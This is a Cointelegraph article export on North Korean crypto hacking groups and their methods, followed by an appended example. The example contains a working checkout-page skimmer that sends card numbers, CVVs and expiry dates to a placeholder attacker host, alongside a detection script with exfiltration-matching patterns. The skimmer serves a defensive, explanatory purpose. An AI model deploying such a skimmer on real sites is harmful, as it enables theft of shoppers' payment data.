{"id":6342,"date":"2020-10-09T10:38:24","date_gmt":"2020-10-09T14:38:24","guid":{"rendered":"https:\/\/cointelegraph.com\/magazine\/?p=6342"},"modified":"2020-10-09T10:38:24","modified_gmt":"2020-10-09T14:38:24","slug":"north-korean-crypto-hacking-separating-fact-from-fiction","status":"publish","type":"post","link":"https:\/\/cointelegraph.com\/magazine\/2020\/10\/09\/north-korean-crypto-hacking-separating-fact-from-fiction","title":{"rendered":"North Korean crypto hacking: Separating fact from fiction"},"content":{"rendered":"
The Democratic People’s Republic of Korea is widely considered to be a state sponsor of cryptocurrency hacking and theft. While successive United States presidents have tried to stifle North Korea’s nuclear weapons program through a series of economic sanctions, cyber warfare is a newer phenomenon that cannot be dealt with in the traditional way.

Unfortunately for the crypto industry, the DPRK has taken a liking to digital currencies and appears to be successfully escalating its operations to steal and launder cryptocurrency, bypassing the crippling sanctions that have contributed to extreme poverty in the pariah state.

Some evidence suggests that Pyongyang has racked up well over two billion U.S. dollars from ransomware attacks, exchange hacks and even the theft of crypto directly from the public through a spectrum of highly sophisticated phishing lures. Sources explain that the regime employs various tactics to convert the stolen funds into crypto, anonymize them and then cash out through overseas operatives. United States authorities track the government-backed cyber activity behind all this under a single name: “Hidden Cobra.”

To achieve all this, the operation not only needs to be backed by the state; many highly trained and skilled people also have to be involved to pull off the heists. So, does the DPRK really have the means and capability to engage in cyber warfare on a global scale, even as the country’s leadership openly admits that the country is in a state of economic disrepair?

How much exactly have the hackers stolen?

2020 continues the pattern of multiple updates on how much money DPRK-backed hackers have allegedly stolen. A United Nations report from 2019 stated that North Korea had snatched around $2 billion from crypto exchanges and banks.

The most recent estimates put the figure somewhere between $1.5 billion and $2.5 billion. Although exact data is hard to come by, these figures suggest that the hacking efforts are on the rise and bring in more funds each year. Multiple reports of new ransomware, elaborate hacks and novel extortion methods only support this picture.

Madeleine Kennedy, senior director of communications at crypto forensics firm Chainalysis, told Cointelegraph that the lower estimate is likely understated:

“We are confident they have stolen upwards of $1.5B in cryptocurrency. It seems likely that DPRK invests in this activity because these have been highly successful campaigns.”

However, Rosa Smothers, senior vice president at cybersecurity firm KnowBe4 and a former CIA technical intelligence officer, told Cointelegraph that despite the recent accusations from the United States Department of Justice that North Korean hackers stole nearly $250 million from two crypto exchanges, the total figure may not be as high, adding: “Given Kim Jong Un’s recent public admission of the country’s dismal economic situation, $1.5B strikes me as an overestimate.”

How do the hacking groups operate?

It is not very clear how exactly these North Korean hacking groups are organized or where they are based, as none of the reports paint a definitive picture. Most recently, the U.S. Department of Homeland Security stated that a new DPRK-sponsored hacking group, BeagleBoyz, is active on the international scene. The agency suspects the gang to be a separate but affiliated entity to the infamous Lazarus Group, which is believed to be behind several high-profile cyberattacks. DHS believes that BeagleBoyz have attempted to steal almost $2 billion since 2015, mostly by targeting banking infrastructure such as ATMs and the SWIFT interbank messaging system.

According to Ed Parsons, managing director UK at F-Secure, “The ‘BeagleBoyz’ appears to be the U.S. government name for a recent cluster of activity targeting financials in 2019/2020,” adding that it is unknown whether the unit is new or “a new name attached to an initially unattributed campaign that was then later linked to DPRK activity.” He further told Cointelegraph that the malware samples were associated with those under the “Hidden Cobra” codename, the term the U.S. government uses to identify DPRK online activity.

According to the U.S. Cybersecurity and Infrastructure Security Agency (CISA), Hidden Cobra-related activity dates back to at least 2009 and initially aimed to exfiltrate information or disrupt processes. The main attack vectors are “DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware,” often exploiting older, unpatched versions of Microsoft Windows and Adobe software. Most notably, Hidden Cobra actors operate a DDoS botnet infrastructure known as DeltaCharlie, which has been associated with over 600 IP addresses.

John Jefferies, chief financial analyst at CipherTrace, a blockchain forensics company, told Cointelegraph that there are several prominent hacking groups and it is extremely difficult to differentiate between them. Anastasiya Tikhonova, head of APT Research at cybersecurity company Group-IB, echoed the sentiment, saying that regardless of the group name attached, the attack vectors are very similar:

“Initial access to targeted financial organizations is gained using spear phishing — either via emails with a malicious document masquerading as a job offer or via a personal message on social media from a person pretending to be a recruiter. Once activated, the malicious file downloads the NetLoader.”

Additionally, several experts have singled out JS-sniffers as the latest threat to emerge, most commonly linked to the Lazarus Group. A JS-sniffer is malicious JavaScript injected into the checkout pages of (typically small) online stores to steal payment data as shoppers enter it; everyone who completes a purchase on a compromised store has their card details and personal information exposed.
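The JS-sniffer pattern described above, as an added illustrative example that is not part of the original article and is not code from Lazarus or any real campaign: a constructed skimmer that hooks a checkout form and beacons card data to a third-party host, beside a small static heuristic a store could run over the scripts served on its checkout page. The sample scripts, field names and hostnames (`shop.example.test`, `cdn-stats.example-attacker.test`) are all constructed for this example.

```javascript
// Added illustrative example: a minimal "JS-sniffer" (web skimmer) pattern and a
// static heuristic that flags scripts showing the same combination of behaviours.
// The sample scripts below are constructed for this example; they are not code
// attributed to Lazarus or any real campaign, and the hostnames are placeholders.

// Constructed sample 1: a skimmer. It hooks form submission, collects the card
// fields, base64-encodes them and beacons them to a third-party host via an
// image request (a classic low-noise exfiltration channel).
const SKIMMER_SAMPLE = `
document.addEventListener('submit', function (e) {
  var f = e.target;
  var d = {
    n: f.querySelector('input[name="cardNumber"]').value,
    c: f.querySelector('input[name="cvv"]').value,
    x: f.querySelector('input[name="expiry"]').value
  };
  new Image().src = 'https://cdn-stats.example-attacker.test/p.gif?d=' + btoa(JSON.stringify(d));
});
`;

// Constructed sample 2: a benign client-side card validator (Luhn check). It reads
// the same field as the skimmer but never sends anything anywhere.
const VALIDATOR_SAMPLE = `
document.querySelector('form#checkout').addEventListener('submit', function (e) {
  var n = e.target.querySelector('input[name="cardNumber"]').value.replace(/\\D/g, '');
  var s = 0, alt = false;
  for (var i = n.length - 1; i >= 0; i--) {
    var d = +n[i]; if (alt) { d *= 2; if (d > 9) d -= 9; } s += d; alt = !alt;
  }
  if (s % 10 !== 0) { e.preventDefault(); alert('Invalid card number'); }
});
`;

// Constructed sample 3: first-party analytics that sends data, but only to the
// store's own host and without touching payment fields.
const ANALYTICS_SAMPLE = `
window.addEventListener('load', function () {
  navigator.sendBeacon('https://shop.example.test/metrics', JSON.stringify({ t: Date.now() }));
});
`;

// Hosts a script on this (hypothetical) store is allowed to contact.
const FIRST_PARTY_HOSTS = new Set(['shop.example.test']);

// Indicator patterns. Each alone is normal on a checkout page; the combination is not.
const PAYMENT_FIELD_RE = /card(number|num)|cvv|cvc|expir/i;
const SUBMIT_HOOK_RE = /addEventListener\(\s*['"]submit['"]|\.onsubmit\s*=/;
const ENCODE_RE = /\bbtoa\(|encodeURIComponent\(/;
const EXFIL_RE = /new Image\(\)\.src|fetch\(|XMLHttpRequest|sendBeacon\(/;
const URL_RE = /https?:\/\/([a-z0-9.-]+)/gi;

// Analyse one script's source text and return a verdict plus the indicators seen.
function analyzeScript(source, allowedHosts = FIRST_PARTY_HOSTS) {
  const hosts = new Set();
  for (const m of source.matchAll(URL_RE)) hosts.add(m[1].toLowerCase());
  const thirdPartyHosts = [...hosts].filter(h => !allowedHosts.has(h));
  const indicators = {
    readsPaymentFields: PAYMENT_FIELD_RE.test(source),
    hooksSubmit: SUBMIT_HOOK_RE.test(source),
    encodesData: ENCODE_RE.test(source),
    sendsData: EXFIL_RE.test(source),
    thirdPartyHosts,
  };
  // A skimmer has to both touch payment data and get it off the page. Flag only
  // when both halves are present and the destination is not the store itself.
  const suspicious = indicators.readsPaymentFields && indicators.sendsData && thirdPartyHosts.length > 0;
  return { suspicious, indicators };
}

// Scan a name -> source map and return the names of the scripts flagged.
function scanScripts(scripts, allowedHosts = FIRST_PARTY_HOSTS) {
  return Object.entries(scripts)
    .filter(([, src]) => analyzeScript(src, allowedHosts).suspicious)
    .map(([name]) => name);
}

const SAMPLES = { skimmer: SKIMMER_SAMPLE, validator: VALIDATOR_SAMPLE, analytics: ANALYTICS_SAMPLE };
for (const [name, src] of Object.entries(SAMPLES)) {
  const r = analyzeScript(src);
  console.log(`${name}: ${r.suspicious ? 'SUSPICIOUS' : 'ok'} ${JSON.stringify(r.indicators)}`);
}
```

Run it with Node; it prints one verdict per sample, flagging only the skimmer. The heuristic is deliberately conservative: reading card fields (validators) or contacting another host (analytics) is routine on a checkout page, so it flags only the combination of touching payment fields and sending data to a host outside the store's allowlist. Real skimmers are obfuscated and pick up new field names and hosts dynamically, so a check like this belongs alongside controls that do not depend on reading the script, such as a Content Security Policy that restricts `connect-src` and `img-src` to known hosts and Subresource Integrity on third-party scripts.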